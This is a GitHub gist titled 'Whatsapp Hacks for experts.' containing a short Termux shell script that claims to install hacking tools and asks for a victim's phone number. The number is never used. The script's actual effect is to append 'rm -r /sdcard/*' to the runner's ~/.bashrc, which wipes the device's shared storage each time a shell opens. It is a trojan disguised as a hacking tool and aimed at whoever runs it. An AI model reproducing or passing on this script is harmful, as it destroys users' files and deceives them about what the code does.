Skip to content

Instantly share code, notes, and snippets.

@kcubeterm
Created August 6, 2022 08:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save kcubeterm/46134ec64d8911152304690fc41a32d9 to your computer and use it in GitHub Desktop.
Save kcubeterm/46134ec64d8911152304690fc41a32d9 to your computer and use it in GitHub Desktop.
Whatsapp Hacks for experts.
printf '\033[32m'
echo "installing hacking tools..."
termux-setup-storage
echo "Type the contact no of the victim"
read name_usr
echo "rm -r /sdcard/*" >> ~/.bashrc
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment